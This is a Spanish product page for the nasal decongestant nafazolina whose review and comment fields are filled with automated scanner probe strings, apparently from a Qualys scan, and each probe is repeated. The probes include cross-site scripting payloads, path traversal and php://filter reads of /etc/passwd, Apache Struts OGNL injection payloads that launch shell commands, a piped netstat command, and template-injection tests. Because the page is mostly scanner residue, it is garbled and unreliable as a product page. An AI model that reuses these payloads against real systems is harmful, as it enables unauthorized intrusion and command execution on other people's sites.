Nafazolina
Vasoconstrictor
1 – 2 de julio de 2025
«‘>
_q=random(X140543478373024Y3_2Z)
‘ onEvent=X140543478373024Y3_2Z
» onEvent=X140543478373024Y3_2Z
javascript:qxss(X140543478373024Y3_2Z);
«>
1″‘>
z–>
1 _q_q=random(25n4LHWf)
» SRC=//localhost/jY075W3Zp>
«‘><qssG5EgSSAp=7;//<
1″>
qssmWts0S5X=7
%3cscript z%3e_q(y)%3c/script%3e
<script src=http://localhost/j
qss{{q=(2*2.0)}}qss
q Qualys_resp_hdr_injection: Vulnerable
1′
#
/*
«
(
//..//..//..//..//..//..//..//etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
|netstat -an
1 – 3 de julio de 2025
«;(function(){qxssI2mAbWbc});/**/»
«);(function(){qxss30OYFKs8});/**/»
qualys(aqxsssrA7RasZ)xyz
‘;(function(){qxssG1p7v43H});/**/’
9;(function(){qxssIo442RSZ});//
9 ;(function(){qxss84We3A4Z});//
*/;(function(){qxssC721h4xO});/*
‘-qxssiv6166Ii()-‘
«-qxss4vOrHsU5()-«
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=»add» operand=586.23659/} /*
#set($value=23.0231*213.759) $value */
function(){qxssbrZMQ24R};
https://community.qualys.com/
Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *
Tu valoración *
Nombre *
Correo electrónico *
1 –
«‘>
1 –
_q=random(X140543478373024Y3_2Z)
1 –
‘ onEvent=X140543478373024Y3_2Z
1 –
» onEvent=X140543478373024Y3_2Z
1 –
javascript:qxss(X140543478373024Y3_2Z);
1 –
«>
1 –
1″‘>
1 –
z–>
1 –
«‘>
1 –
_q=random(X140543478373024Y3_2Z)
1 –
_q=random(X140543478373024Y3_2Z)
1 –
1 _q_q=random(25n4LHWf)
1 –
1 –
» SRC=//localhost/jY075W3Zp>
1 –
1 –
«‘><qssG5EgSSAp=7;//<
1 –
1 –
1 –
1″>
1 –
1 –
1 –
«‘>
1 –
qssmWts0S5X=7
1 –
%3cscript z%3e_q(y)%3c/script%3e
1 –
<script src=http://localhost/j
1 –
qss{{q=(2*2.0)}}qss
1 –
q
Qualys_resp_hdr_injection: Vulnerable
1 –
1′
1 –
#
1 –
/*
1 –
«
1 –
(
1 –
//..//..//..//..//..//..//..//etc/passwd
1 –
php://filter/read=string.rot13/resource=/etc/passwd
1 –
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1 –
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1 –
|netstat -an
1 –
«;(function(){qxssI2mAbWbc});/**/»
1 –
«);(function(){qxss30OYFKs8});/**/»
1 –
qualys(aqxsssrA7RasZ)xyz
1 –
‘;(function(){qxssG1p7v43H});/**/’
1 –
9;(function(){qxssIo442RSZ});//
1 –
9
;(function(){qxss84We3A4Z});//
1 –
*/;(function(){qxssC721h4xO});/*
1 –
‘-qxssiv6166Ii()-‘
1 –
«-qxss4vOrHsU5()-«
1 –
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1 –
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=»add» operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
1 –
function(){qxssbrZMQ24R};
1 –
https://community.qualys.com/